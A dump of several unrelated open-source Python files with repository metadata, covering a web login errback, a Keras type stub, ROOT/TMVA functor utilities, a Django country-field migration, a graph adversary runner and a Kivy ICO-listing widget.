        """ Used as an errback upon failed login, returns a 2-tuple of a failure URL
        with the query argument 'login-failure' set to the parameter
        loginFailure, and an empty list of segments, to redirect to that URL.
        The basis for this error URL, i.e. the part before the query string, is
        taken either from the 'referer' header from the given request if one
        exists, or a computed URL that points at the same page that the user is
        currently looking at to attempt login.  Any existing query string will
        be stripped.
        """
        request = inevow.IRequest(ctx)
        # Only UnauthorizedLogin is handled here; anything else re-raises.
        error.trap(UnauthorizedLogin)
        referer = request.getHeader("referer")
        if referer is not None:
            u = url.URL.fromString(referer)
        else:
            u = urlToChild(ctx, *segments)
        u = u.clear()
        u = u.add('login-failure', loginFailure)
        return u, ()
    def authRequiredError(self, error, session):
        """Errback for failed HTTP-auth login: kill the session and 403."""
        session.expire()
        error.trap(UnauthorizedLogin)
        return Forbidden(), ()
    def cookieDomainForRequest(self, request):
        """
        Specify the domain restriction on the session cookie.
        @param request: The request object in response to which a cookie is
            being set.
        @return: C{None} or a C{str} giving the domain restriction to set on
            the cookie.
        """
        return None
| [
"junwin@gmail.com"
] | junwin@gmail.com |
5f93747a95298ff1f96092486f57e56a702b47cf | 9f1039075cc611198a988034429afed6ec6d7408 | /tensorflow-stubs/python/keras/engine/training.pyi | 87a6a2450c166433875a253c15926a2225a32a76 | [] | no_license | matangover/tensorflow-stubs | 9422fbb1cb3a3638958d621461291c315f9c6ec2 | 664bd995ef24f05ba2b3867d979d23ee845cb652 | refs/heads/master | 2020-05-23T12:03:40.996675 | 2019-05-15T06:21:43 | 2019-05-15T06:21:43 | 186,748,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,674 | pyi | # Stubs for tensorflow.python.keras.engine.training (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from tensorflow.python.data.ops import dataset_ops as dataset_ops, iterator_ops as iterator_ops
from tensorflow.python.data.ops.dataset_ops import Dataset as Dataset
from tensorflow.python.eager import context as context
from tensorflow.python.framework import errors as errors, ops as ops, tensor_util as tensor_util
from tensorflow.python.keras import losses as losses, optimizers as optimizers
from tensorflow.python.keras.engine import base_layer as base_layer, distributed_training_utils as distributed_training_utils, training_arrays as training_arrays, training_distributed as training_distributed, training_eager as training_eager, training_generator as training_generator, training_utils as training_utils
from tensorflow.python.keras.engine.network import Network as Network
from tensorflow.python.keras.utils import data_utils as data_utils
from tensorflow.python.keras.utils.generic_utils import slice_arrays as slice_arrays
from tensorflow.python.ops import math_ops as math_ops, weights_broadcast_ops as weights_broadcast_ops
from tensorflow.python.util import nest as nest
from tensorflow.python.util.tf_export import tf_export as tf_export
from typing import Any as Any, Optional as Optional
# Type stub for tf.keras Model: declares the training/evaluation/prediction
# API surface only.  Bodies are intentionally elided with `...`.
class Model(Network):
    def __init__(self, *args: Any, **kwargs: Any) -> None: ...
    # Attributes populated by compile(); all typed Any in this stub.
    optimizer: Any = ...
    loss: Any = ...
    metrics: Any = ...
    loss_weights: Any = ...
    sample_weight_mode: Any = ...
    weighted_metrics: Any = ...
    target_tensors: Any = ...
    loss_functions: Any = ...
    loss_weights_list: Any = ...
    total_loss: Any = ...
    targets: Any = ...
    train_function: Any = ...
    test_function: Any = ...
    predict_function: Any = ...
    def compile(self, optimizer: Any, loss: Optional[Any] = ..., metrics: Optional[Any] = ..., loss_weights: Optional[Any] = ..., sample_weight_mode: Optional[Any] = ..., weighted_metrics: Optional[Any] = ..., target_tensors: Optional[Any] = ..., distribute: Optional[Any] = ..., **kwargs: Any) -> None: ...
    def fit(self, x: Optional[Any] = ..., y: Optional[Any] = ..., batch_size: Optional[Any] = ..., epochs: int = ..., verbose: int = ..., callbacks: Optional[Any] = ..., validation_split: float = ..., validation_data: Optional[Any] = ..., shuffle: bool = ..., class_weight: Optional[Any] = ..., sample_weight: Optional[Any] = ..., initial_epoch: int = ..., steps_per_epoch: Optional[Any] = ..., validation_steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., **kwargs: Any): ...
    def evaluate(self, x: Optional[Any] = ..., y: Optional[Any] = ..., batch_size: Optional[Any] = ..., verbose: int = ..., sample_weight: Optional[Any] = ..., steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ...): ...
    def predict(self, x: Any, batch_size: Optional[Any] = ..., verbose: int = ..., steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ...): ...
    def train_on_batch(self, x: Any, y: Optional[Any] = ..., sample_weight: Optional[Any] = ..., class_weight: Optional[Any] = ...): ...
    def test_on_batch(self, x: Any, y: Optional[Any] = ..., sample_weight: Optional[Any] = ...): ...
    def predict_on_batch(self, x: Any): ...
    def fit_generator(self, generator: Any, steps_per_epoch: Optional[Any] = ..., epochs: int = ..., verbose: int = ..., callbacks: Optional[Any] = ..., validation_data: Optional[Any] = ..., validation_steps: Optional[Any] = ..., class_weight: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., shuffle: bool = ..., initial_epoch: int = ...): ...
    def evaluate_generator(self, generator: Any, steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., verbose: int = ...): ...
    def predict_generator(self, generator: Any, steps: Optional[Any] = ..., max_queue_size: int = ..., workers: int = ..., use_multiprocessing: bool = ..., verbose: int = ...): ...
# Stub for the wrapper model used by callbacks during distributed training;
# __getattr__ forwards unknown attributes (signature-only declaration here).
class DistributedCallbackModel(Model):
    def __init__(self, model: Any) -> None: ...
    def set_original_model(self, orig_model: Any) -> None: ...
    def save_weights(self, filepath: Any, overwrite: bool = ..., save_format: Optional[Any] = ...) -> None: ...
    def save(self, filepath: Any, overwrite: bool = ..., include_optimizer: bool = ...) -> None: ...
    def load_weights(self, filepath: Any, by_name: bool = ...) -> None: ...
    def __getattr__(self, item: Any) -> None: ...
| [
"matangover@gmail.com"
] | matangover@gmail.com |
1a6d659303222b5d59f9083a0bc38b15e669503e | 1025bc2aa5aaa40970ad1a51d8d0b1202a1ea11e | /StatTools/python/RooFunctorFromWS.py | 61a6d6dc6bf708de8fef6714998d0555c78dac99 | [] | no_license | uwcms/FinalStateAnalysis | f2be318546728621676a4b90ed2678b2560c94e6 | bcb164a8e27d459a9ac438780f6c8730d3e856bf | refs/heads/miniAOD_9_4_0 | 2022-11-09T01:28:52.199025 | 2019-03-15T19:25:10 | 2019-03-15T19:25:10 | 5,201,989 | 5 | 32 | null | 2020-11-19T17:02:32 | 2012-07-27T07:51:18 | Python | UTF-8 | Python | false | false | 7,941 | py | '''
RooFunctorFromWS
Builds a functor from a function in a RooWorkspace.
This could be improved with cython.
Author: Evan K. Friis, UW Madison
>>> from FinalStateAnalysis.Utilities.rootbindings import ROOT
>>> file = ROOT.TFile('../test/test_RooFunctorFromWS.root')
>>> ws = file.Get('fit_efficiency')
>>> functor = RooFunctorFromWS(ws, 'efficiency')
>>> '%0.4f' % functor(60)
'0.0244'
>>> '%0.4f' % functor(140)
'0.0138'
'''
from FinalStateAnalysis.Utilities.rootbindings import ROOT
import array
from pdb import set_trace
from FinalStateAnalysis.PlotTools.decorators import memo_last
# NOTE(review): the explicit C++ library load is disabled -- presumably no
# longer required through PyROOT; confirm before deleting the line.
#ROOT.gSystem.Load("libFinalStateAnalysisStatTools")
# TMVA's singleton tools object must exist before any TMVA.Reader is
# created, so it is instantiated once at import time.
TMVA_tools = ROOT.TMVA.Tools.Instance()
class RooFunctorFromWS(ROOT.RooFunctor):
    """Wrap a function stored in a RooWorkspace as a plain callable f(x)."""

    def __init__(self, workspace, functionname, var='x'):
        # Look up the RooAbsReal by name inside the workspace.
        self.function = workspace.function(functionname)
        # Resolve the independent variable.  RooFormulaVar exposes
        # getParameter(); other function types only expose their variable
        # set, so fall back to a lookup by name there.
        if hasattr(self.function, 'getParameter'):
            self.x = self.function.getParameter(var)
        else:
            self.x = self.function.getVariables().find(var)
        # Give the independent variable an effectively unbounded range.
        self.x.setRange(0, 1e99)

    def __call__(self, x):
        # Evaluate the workspace function at the requested point.
        self.x.setVal(x)
        return self.function.getVal()
class FunctorFromTF1(object):
    """Callable wrapper around a TF1 stored inside a ROOT file."""

    def __init__(self, tfile_name, path):
        # Keep the TFile object alive for the functor's lifetime so ROOT
        # does not delete the TF1 together with the closed file.
        self.tfile = ROOT.TFile.Open(tfile_name)
        self.function = self.tfile.Get(path)

    def __call__(self, x):
        # Evaluate the wrapped TF1 at x.
        return self.function.Eval(x)
class MultiFunctorFromTF1(object):
    """Piecewise functor: evaluates one of several TF1s depending on y.

    ``paths_and_borders`` is an iterable of ``(path, (y_low, y_high))``
    entries; the TF1 found at ``path`` inside ``tfile_name`` is evaluated
    at ``x`` for y values in ``[y_low, y_high)`` (lower edge inclusive,
    upper edge exclusive).
    """

    def __init__(self, tfile_name, paths_and_borders):
        # Keep the TFile open so ROOT does not delete the TF1 objects.
        self.tfile = ROOT.TFile.Open(tfile_name)
        self.fcns_and_borders = []
        for path, borders in paths_and_borders:
            self.fcns_and_borders.append(
                (self.tfile.Get(path),
                 borders)
            )

    def __call__(self, x, y):
        for fcn, border in self.fcns_and_borders:
            if border[0] <= y < border[1]:
                return fcn.Eval(x)
        # Fixed garbled error message ("y range aoutside boundaries").
        raise ValueError("MultiFunctorFromTF1: y value outside the configured borders!")
class FunctorFromMVA(object):
    """Evaluate a trained TMVA method (from an XML weight file) as a callable.

    The functor must be invoked with keyword arguments whose names match
    exactly the training variables.
    """

    def __init__(self, name, xml_filename, *variables, **kwargs):
        opts = "!Color:Silent=%s:Verbose=%s" % (kwargs.get('silent', 'T'), kwargs.get('verbose', 'F'))
        self.reader = ROOT.TMVA.Reader(opts)
        self.var_map = {}
        self.name = name
        self.variables = variables
        self.xml_filename = xml_filename
        # TMVA reads inputs through bound single-float buffers, one per
        # training variable.
        for var in variables:
            buf = array.array('f', [0])
            self.var_map[var] = buf
            self.reader.AddVariable(var, buf)
        self.reader.BookMVA(name, xml_filename)

    def evaluate_(self):
        # Kept as a separate method so profilers can attribute TMVA time.
        return self.reader.EvaluateMVA(self.name)

    @memo_last
    def __call__(self, **kvars):
        # Enforce that the caller supplies exactly the training variables.
        provided = kvars.keys()
        if not (all(name in self.variables for name in provided) and
                all(name in provided for name in self.variables)):
            raise Exception("Wrong variable names. Available variables: %s" % repr(self.variables))
        for name, val in kvars.iteritems():
            self.var_map[name][0] = val
        return self.evaluate_()
class MultiFunctorFromMVA(object):
    '''Phil's diboson subtraction implementation'''
    # Combines a data-trained MVA (weight +1) with negatively-weighted
    # MC-trained MVAs; each MC weight is the luminosity ratio scaled by the
    # relative number of training events inside the requested phase space.

    def __init__(self, name, data_and_lumi, mcs_and_lumis, *variables, **kwargs):
        phase_space = kwargs.get('phase_space', '')
        print('phase_space: %s' % phase_space)
        self.functors_and_weights = []
        data_xml, data_lumi = data_and_lumi
        self.functors_and_weights.append(
            (FunctorFromMVA('_'.join([name, data_xml]), data_xml, *variables, **kwargs),
             1.)
        )
        training_path = kwargs.get('training_ntuple', 'training_ntuple')

        def count_phase_space(xml_name):
            # The training ntuple lives next to the weight file (.root).
            tfile = ROOT.TFile.Open(xml_name.replace('weights.xml', 'root'))
            entries = tfile.Get(training_path).GetEntries(phase_space)
            tfile.Close()
            return entries

        data_phase_space = count_phase_space(data_xml)
        for xml, lumi in mcs_and_lumis:
            # Negative weight: these terms subtract the MC contamination.
            mc_phase_space = count_phase_space(xml)
            weight = -((data_lumi / lumi) * (float(mc_phase_space) / float(data_phase_space)))
            self.functors_and_weights.append(
                (FunctorFromMVA('_'.join([name, xml]), xml, *variables, **kwargs),
                 weight)
            )

    @memo_last
    def __call__(self, **kvars):
        total = 0
        for functor, weight in self.functors_and_weights:
            total += weight * functor(**kvars)
        return total
def build_roofunctor(filename, wsname, functionname, var='x'):
    ''' Build a functor from a filename '''
    # Renamed local away from the `file` builtin it used to shadow.
    tfile = ROOT.TFile.Open(filename)
    if not tfile:
        raise IOError("Can't open file: %s" % filename)
    workspace = tfile.Get(wsname)
    return RooFunctorFromWS(workspace, functionname, var)
def make_corrector_from_th2(filename, path):
    """Return a lookup function (x, y) -> bin content of the TH2 at `path`.

    Coordinates falling into the under/overflow are clamped onto the
    first/last visible bin; empty bins yield a tiny non-zero value so
    callers can divide by the result safely.
    """
    tfile = ROOT.TFile.Open(filename)
    if not tfile:
        raise IOError("Can't open file: %s" % filename)
    hist = tfile.Get(path).Clone()
    binsx = hist.GetNbinsX()
    binsy = hist.GetNbinsY()

    def corrector(xval, yval):
        # FindFixBin is faster than FindBin and never extends the axis.
        xbin = min(max(hist.GetXaxis().FindFixBin(xval), 1), binsx)
        ybin = min(max(hist.GetYaxis().FindFixBin(yval), 1), binsy)
        prob = hist.GetBinContent(xbin, ybin)
        return prob if prob else 10**-8
    return corrector
def make_corrector_from_histo(filename, path, dimensions='2D'):
    """Return a lookup function over a 1D or 2D histogram stored in a ROOT file.

    The returned callable maps ``(xval[, yval])`` to the content of the
    corresponding bin.  Under/overflow coordinates are clamped onto the
    first/last visible bin, and empty bins return ``1e-8`` so callers may
    divide by the result without a ZeroDivisionError.

    Bug fix: the 2D branch used to overwrite ``xbin`` with the y-axis bin
    (leaving ``ybin`` as None), which broke every 2D lookup.
    """
    is2d = (dimensions.lower() == '2d')
    tfile = ROOT.TFile.Open(filename)
    if not tfile:
        raise IOError("Can't open file: %s" % filename)
    hist = tfile.Get(path).Clone()
    binsx = hist.GetNbinsX()
    binsy = hist.GetNbinsY() if is2d else None
    def refFun(xval, yval=None):
        # FindFixBin is faster than FindBin; clamp under/overflow onto the
        # first/last visible bin.
        xbin = max(min(hist.GetXaxis().FindFixBin(xval), binsx), 1)
        if is2d:
            ybin = max(min(hist.GetYaxis().FindFixBin(yval), binsy), 1)
            prob = hist.GetBinContent(xbin, ybin)
        else:
            prob = hist.GetBinContent(xbin)
        if prob:
            return prob
        else:
            return 10**-8
    return refFun
# Backward-compatibility alias: the TH2-only corrector name now points at
# the generic histogram corrector (this shadows the older definition above).
make_corrector_from_th2 = make_corrector_from_histo
def build_uncorr_2Droofunctor(functor_x, functor_y, filename, num='numerator', den='denominator'):
''' Build a functor from a filename '''
file = ROOT.TFile.Open(filename)
num_int = file.Get(num).Integral()
den_int = file.Get(den).Integral()
scale = num_int/den_int
def _f(x, y):
print scale
return functor_x(x)*functor_y(y)/scale
return _f
if __name__ == "__main__":
    # Smoke test: run the doctest examples in the module docstring.
    import doctest; doctest.testmod()
| [
"Silvia.Taroni@cern.ch"
] | Silvia.Taroni@cern.ch |
6f821c9d5633f1d86773ad0b9df3158f4d007975 | a99372d1c71be907e1fbfb4f7287363ff1f51f56 | /accounts/migrations/0002_auto_20190125_0913.py | ad9b20ba3f75f20c8f1d15c91ef73f31aca5bc2a | [
"MIT"
] | permissive | domambia/csdigital-gs1kenya-internal-erp | 43045c219b627453f30da9c6bd62335985f81927 | be36378ad7b960d074dd5841aaadc849ac6356de | refs/heads/master | 2022-12-10T13:49:55.516938 | 2021-10-31T15:08:29 | 2021-10-31T15:08:29 | 164,619,152 | 17 | 14 | null | 2022-12-08T01:44:41 | 2019-01-08T09:59:34 | Python | UTF-8 | Python | false | false | 8,523 | py | # Generated by Django 2.1.5 on 2019-01-25 09:13
from django.db import migrations, models
# Auto-generated by Django (makemigrations); only comments should be added
# here -- the recorded operations must match the migration state history.
class Migration(migrations.Migration):
    dependencies = [
        ('accounts', '0001_initial'),
    ]
    # Widens Employee.county into an optional country choice field
    # (django-countries-style ISO country name list).
    operations = [
        migrations.AlterField(
            model_name='employee',
            name='county',
            field=models.CharField(blank=True, choices=[('Aruba', 'Aruba'), ('Afghanistan', 'Afghanistan'), ('Angola', 'Angola'), ('Anguilla', 'Anguilla'), ('Åland Islands', 'Åland Islands'), ('Albania', 'Albania'), ('Andorra', 'Andorra'), ('United Arab Emirates', 'United Arab Emirates'), ('Argentina', 'Argentina'), ('Armenia', 'Armenia'), ('American Samoa', 'American Samoa'), ('Antarctica', 'Antarctica'), ('French Southern Territories', 'French Southern Territories'), ('Antigua and Barbuda', 'Antigua and Barbuda'), ('Australia', 'Australia'), ('Austria', 'Austria'), ('Azerbaijan', 'Azerbaijan'), ('Burundi', 'Burundi'), ('Belgium', 'Belgium'), ('Benin', 'Benin'), ('Bonaire, Sint Eustatius and Saba', 'Bonaire, Sint Eustatius and Saba'), ('Burkina Faso', 'Burkina Faso'), ('Bangladesh', 'Bangladesh'), ('Bulgaria', 'Bulgaria'), ('Bahrain', 'Bahrain'), ('Bahamas', 'Bahamas'), ('Bosnia and Herzegovina', 'Bosnia and Herzegovina'), ('Saint Barthélemy', 'Saint Barthélemy'), ('Belarus', 'Belarus'), ('Belize', 'Belize'), ('Bermuda', 'Bermuda'), ('Bolivia, Plurinational State of', 'Bolivia, Plurinational State of'), ('Brazil', 'Brazil'), ('Barbados', 'Barbados'), ('Brunei Darussalam', 'Brunei Darussalam'), ('Bhutan', 'Bhutan'), ('Bouvet Island', 'Bouvet Island'), ('Botswana', 'Botswana'), ('Central African Republic', 'Central African Republic'), ('Canada', 'Canada'), ('Cocos (Keeling) Islands', 'Cocos (Keeling) Islands'), ('Switzerland', 'Switzerland'), ('Chile', 'Chile'), ('China', 'China'), ("Côte d'Ivoire", "Côte d'Ivoire"), ('Cameroon', 'Cameroon'), ('Congo, The Democratic Republic of the', 'Congo, The Democratic Republic of the'), ('Congo', 'Congo'), ('Cook Islands', 'Cook Islands'), ('Colombia', 'Colombia'), ('Comoros', 'Comoros'), ('Cabo Verde', 'Cabo Verde'), ('Costa Rica', 'Costa Rica'), ('Cuba', 'Cuba'), ('Curaçao', 'Curaçao'), ('Christmas Island', 'Christmas Island'), ('Cayman Islands', 'Cayman Islands'), ('Cyprus', 'Cyprus'), ('Czechia', 'Czechia'), ('Germany', 'Germany'), 
('Djibouti', 'Djibouti'), ('Dominica', 'Dominica'), ('Denmark', 'Denmark'), ('Dominican Republic', 'Dominican Republic'), ('Algeria', 'Algeria'), ('Ecuador', 'Ecuador'), ('Egypt', 'Egypt'), ('Eritrea', 'Eritrea'), ('Western Sahara', 'Western Sahara'), ('Spain', 'Spain'), ('Estonia', 'Estonia'), ('Ethiopia', 'Ethiopia'), ('Finland', 'Finland'), ('Fiji', 'Fiji'), ('Falkland Islands (Malvinas)', 'Falkland Islands (Malvinas)'), ('France', 'France'), ('Faroe Islands', 'Faroe Islands'), ('Micronesia, Federated States of', 'Micronesia, Federated States of'), ('Gabon', 'Gabon'), ('United Kingdom', 'United Kingdom'), ('Georgia', 'Georgia'), ('Guernsey', 'Guernsey'), ('Ghana', 'Ghana'), ('Gibraltar', 'Gibraltar'), ('Guinea', 'Guinea'), ('Guadeloupe', 'Guadeloupe'), ('Gambia', 'Gambia'), ('Guinea-Bissau', 'Guinea-Bissau'), ('Equatorial Guinea', 'Equatorial Guinea'), ('Greece', 'Greece'), ('Grenada', 'Grenada'), ('Greenland', 'Greenland'), ('Guatemala', 'Guatemala'), ('French Guiana', 'French Guiana'), ('Guam', 'Guam'), ('Guyana', 'Guyana'), ('Hong Kong', 'Hong Kong'), ('Heard Island and McDonald Islands', 'Heard Island and McDonald Islands'), ('Honduras', 'Honduras'), ('Croatia', 'Croatia'), ('Haiti', 'Haiti'), ('Hungary', 'Hungary'), ('Indonesia', 'Indonesia'), ('Isle of Man', 'Isle of Man'), ('India', 'India'), ('British Indian Ocean Territory', 'British Indian Ocean Territory'), ('Ireland', 'Ireland'), ('Iran, Islamic Republic of', 'Iran, Islamic Republic of'), ('Iraq', 'Iraq'), ('Iceland', 'Iceland'), ('Israel', 'Israel'), ('Italy', 'Italy'), ('Jamaica', 'Jamaica'), ('Jersey', 'Jersey'), ('Jordan', 'Jordan'), ('Japan', 'Japan'), ('Kazakhstan', 'Kazakhstan'), ('Kenya', 'Kenya'), ('Kyrgyzstan', 'Kyrgyzstan'), ('Cambodia', 'Cambodia'), ('Kiribati', 'Kiribati'), ('Saint Kitts and Nevis', 'Saint Kitts and Nevis'), ('Korea, Republic of', 'Korea, Republic of'), ('Kuwait', 'Kuwait'), ("Lao People's Democratic Republic", "Lao People's Democratic Republic"), ('Lebanon', 'Lebanon'), 
('Liberia', 'Liberia'), ('Libya', 'Libya'), ('Saint Lucia', 'Saint Lucia'), ('Liechtenstein', 'Liechtenstein'), ('Sri Lanka', 'Sri Lanka'), ('Lesotho', 'Lesotho'), ('Lithuania', 'Lithuania'), ('Luxembourg', 'Luxembourg'), ('Latvia', 'Latvia'), ('Macao', 'Macao'), ('Saint Martin (French part)', 'Saint Martin (French part)'), ('Morocco', 'Morocco'), ('Monaco', 'Monaco'), ('Moldova, Republic of', 'Moldova, Republic of'), ('Madagascar', 'Madagascar'), ('Maldives', 'Maldives'), ('Mexico', 'Mexico'), ('Marshall Islands', 'Marshall Islands'), ('Macedonia, Republic of', 'Macedonia, Republic of'), ('Mali', 'Mali'), ('Malta', 'Malta'), ('Myanmar', 'Myanmar'), ('Montenegro', 'Montenegro'), ('Mongolia', 'Mongolia'), ('Northern Mariana Islands', 'Northern Mariana Islands'), ('Mozambique', 'Mozambique'), ('Mauritania', 'Mauritania'), ('Montserrat', 'Montserrat'), ('Martinique', 'Martinique'), ('Mauritius', 'Mauritius'), ('Malawi', 'Malawi'), ('Malaysia', 'Malaysia'), ('Mayotte', 'Mayotte'), ('Namibia', 'Namibia'), ('New Caledonia', 'New Caledonia'), ('Niger', 'Niger'), ('Norfolk Island', 'Norfolk Island'), ('Nigeria', 'Nigeria'), ('Nicaragua', 'Nicaragua'), ('Niue', 'Niue'), ('Netherlands', 'Netherlands'), ('Norway', 'Norway'), ('Nepal', 'Nepal'), ('Nauru', 'Nauru'), ('New Zealand', 'New Zealand'), ('Oman', 'Oman'), ('Pakistan', 'Pakistan'), ('Panama', 'Panama'), ('Pitcairn', 'Pitcairn'), ('Peru', 'Peru'), ('Philippines', 'Philippines'), ('Palau', 'Palau'), ('Papua New Guinea', 'Papua New Guinea'), ('Poland', 'Poland'), ('Puerto Rico', 'Puerto Rico'), ("Korea, Democratic People's Republic of", "Korea, Democratic People's Republic of"), ('Portugal', 'Portugal'), ('Paraguay', 'Paraguay'), ('Palestine, State of', 'Palestine, State of'), ('French Polynesia', 'French Polynesia'), ('Qatar', 'Qatar'), ('Réunion', 'Réunion'), ('Romania', 'Romania'), ('Russian Federation', 'Russian Federation'), ('Rwanda', 'Rwanda'), ('Saudi Arabia', 'Saudi Arabia'), ('Sudan', 'Sudan'), ('Senegal', 
'Senegal'), ('Singapore', 'Singapore'), ('South Georgia and the South Sandwich Islands', 'South Georgia and the South Sandwich Islands'), ('Saint Helena, Ascension and Tristan da Cunha', 'Saint Helena, Ascension and Tristan da Cunha'), ('Svalbard and Jan Mayen', 'Svalbard and Jan Mayen'), ('Solomon Islands', 'Solomon Islands'), ('Sierra Leone', 'Sierra Leone'), ('El Salvador', 'El Salvador'), ('San Marino', 'San Marino'), ('Somalia', 'Somalia'), ('Saint Pierre and Miquelon', 'Saint Pierre and Miquelon'), ('Serbia', 'Serbia'), ('South Sudan', 'South Sudan'), ('Sao Tome and Principe', 'Sao Tome and Principe'), ('Suriname', 'Suriname'), ('Slovakia', 'Slovakia'), ('Slovenia', 'Slovenia'), ('Sweden', 'Sweden'), ('Swaziland', 'Swaziland'), ('Sint Maarten (Dutch part)', 'Sint Maarten (Dutch part)'), ('Seychelles', 'Seychelles'), ('Syrian Arab Republic', 'Syrian Arab Republic'), ('Turks and Caicos Islands', 'Turks and Caicos Islands'), ('Chad', 'Chad'), ('Togo', 'Togo'), ('Thailand', 'Thailand'), ('Tajikistan', 'Tajikistan'), ('Tokelau', 'Tokelau'), ('Turkmenistan', 'Turkmenistan'), ('Timor-Leste', 'Timor-Leste'), ('Tonga', 'Tonga'), ('Trinidad and Tobago', 'Trinidad and Tobago'), ('Tunisia', 'Tunisia'), ('Turkey', 'Turkey'), ('Tuvalu', 'Tuvalu'), ('Taiwan, Province of China', 'Taiwan, Province of China'), ('Tanzania, United Republic of', 'Tanzania, United Republic of'), ('Uganda', 'Uganda'), ('Ukraine', 'Ukraine'), ('United States Minor Outlying Islands', 'United States Minor Outlying Islands'), ('Uruguay', 'Uruguay'), ('United States', 'United States'), ('Uzbekistan', 'Uzbekistan'), ('Holy See (Vatican City State)', 'Holy See (Vatican City State)'), ('Saint Vincent and the Grenadines', 'Saint Vincent and the Grenadines'), ('Venezuela, Bolivarian Republic of', 'Venezuela, Bolivarian Republic of'), ('Virgin Islands, British', 'Virgin Islands, British'), ('Virgin Islands, U.S.', 'Virgin Islands, U.S.'), ('Viet Nam', 'Viet Nam'), ('Vanuatu', 'Vanuatu'), ('Wallis and Futuna', 
'Wallis and Futuna'), ('Samoa', 'Samoa'), ('Yemen', 'Yemen'), ('South Africa', 'South Africa'), ('Zambia', 'Zambia'), ('Zimbabwe', 'Zimbabwe')], default='No country', max_length=100),
        ),
    ]
| [
"omambiadauglous@gmail.com"
] | omambiadauglous@gmail.com |
f3bfb9ab8e84fa184357abde57024da707ea358c | 9e371869045a2f091f633e9335ab091b368f254c | /src/n_hop.py | 0d97d1f5f79216f73ebf2f9686a240b122f69977 | [
"MIT"
] | permissive | liaopeiyuan/information-obfuscation-demo | e10e0bedf49a4e92d387b1c72855455a6a6fb34b | 018cb6a2cce5033bf836d78aa8824204ec5553f7 | refs/heads/main | 2023-07-14T12:06:59.544186 | 2021-08-13T11:06:14 | 2021-08-13T11:06:14 | 395,622,445 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,181 | py | # -*- coding: utf-8 -*-
from models import (GAL_Nhop, NeighborClassifier, NodeClassifier,
SharedBilinearDecoder)
from node_attack import NodeAttackRunner
class NHopAttackRunner(NodeAttackRunner):
    """Runner for the n-hop variant of the node attack.

    Same setup as the plain node attack, but the base model is the n-hop
    GAL encoder and two adversaries (a node classifier and a neighbor
    classifier) are trained against its embeddings.
    """

    def __init__(self, args):
        super().__init__(args)

    def get_base_model(self):
        # Build the decoder first; the GAL encoder wraps it.
        device = self.args.device
        decoder = SharedBilinearDecoder(
            self.args.num_rel, 2, self.args.embed_dim, self.args
        ).to(device)
        return GAL_Nhop(
            decoder, self.args.embed_dim, self.args.num_ent, self.edges, self.args
        ).to(device)

    def num_adversaries(self):
        # One node classifier plus one neighbor classifier.
        return 2

    def get_ordered_adversary_names(self):
        return ["Node", "Neighbor"]

    def get_adversary_models(self, mode):
        # Detach the current encoder output so the adversaries train on a
        # frozen snapshot of the embeddings.
        embeddings = self.base_model.encode(None).detach().squeeze(0)
        device = self.args.device
        node_clf = NodeClassifier(self.args.embed_dim, embeddings).to(device)
        neighbor_clf = NeighborClassifier(self.args.embed_dim, embeddings, self.edges).to(device)
        return [node_clf, neighbor_clf]
if __name__ == "__main__":
    # This module only defines NHopAttackRunner; exec.py is the entry point.
    # Raise instead of `assert False`: asserts are stripped under `python -O`,
    # which would silently allow direct execution.
    raise SystemExit("You shouldn't run this module directly. Please call exec.py")
| [
"alexander_liao@outlook.com"
] | alexander_liao@outlook.com |
14bc832d47b3da2154b8587a674dcb20b9082d4a | 02c30e3e2c0f701d77f0a23591027ae62f37a512 | /libs/uix/baseclasses/ico_dir/icobazaar.py | d1952e1f8fc355ded5e1550906d1a7a946896863 | [
"MIT"
] | permissive | mkbeh/CRyptoLab | 5341a48a403ecf23e10248c46e919c1381275551 | 424c938c16c9264e99eff71e4c1a27ca65314d42 | refs/heads/master | 2022-12-22T06:39:36.909313 | 2018-09-25T14:40:32 | 2018-09-25T14:40:32 | 144,743,677 | 0 | 2 | MIT | 2022-12-08T02:22:14 | 2018-08-14T16:09:19 | Python | UTF-8 | Python | false | false | 4,537 | py | # -*- coding: utf-8 -*-
from kivy.lang.builder import Builder
from kivy.properties import ObjectProperty
from kivy.cache import Cache
from kivy.uix.boxlayout import BoxLayout
from libs.customwidgets.ico.cardicobazaar import CardIcoBazaar
from libs.customwidgets.popupcm import PopupCM, PopupCMContent
from libs.utils import utils
Builder.load_string('''
<Icobazaar>:
cats_box: cats_box
upcoming: upcoming
categories: categories
grid_box: grid_box
orientation: 'vertical'
size_hint_y: None
height: self.minimum_height
GridLayout:
id: cats_box
size_hint_y: None
cols: 3
rows: 2
NavigationDrawerIconButton:
text: "Upcoming"
badge_text: '12'
id: upcoming
name: 'upcoming'
on_release: root.on_event(upcoming)
NavigationDrawerIconButton:
text: "Ongoing"
badge_text: '12'
id: ongoing
name: 'ongoing'
on_release: root.on_event(ongoing)
NavigationDrawerIconButton:
text: "Ended"
badge_text: '12'
id: ended
name: 'ended'
on_release: root.on_event(ended)
NavigationDrawerIconButton:
text: "New"
badge_text: '12'
id: new
name: 'new'
on_release: root.on_event(new)
NavigationDrawerIconButton:
text: "All"
badge_text: '12'
id: all
name: 'all'
on_release: root.on_event(all)
NavigationDrawerIconButton:
id: categories
name: 'categories'
text: "Open Categories"
icon: 'menu-down'
on_release:
root.open_categories_popup();
root.on_event(categories)
GridLayout:
id: grid_box
cols: 1
spacing: dp(20)
pos_hint: {'center_x':.5}
size_hint: (.95, None)
''')
class Icobazaar(BoxLayout):
    """Screen listing ICO projects from the ICObazaar source, filterable by
    category buttons and a categories popup."""
    # kv-bound widget references (populated by the rule above).
    cats_box = ObjectProperty(None)
    grid_box = ObjectProperty(None)
    categories = ObjectProperty()
    upcoming = ObjectProperty()
    last_category_btn = None  # Last category menu button that was pressed.
    def __init__(self, **kwargs):
        super(Icobazaar, self).__init__(**kwargs)
        # Popup title is user-facing Russian text ("Categories").
        self.popup = PopupCM(title='Категории', content=PopupCMContent())
        self.gen_cards()
    def open_categories_popup(self):
        """
        Open the popup that contains the list of ICO categories.
        :return: None
        """
        self.popup.open()
    def on_event(self, obj):
        """
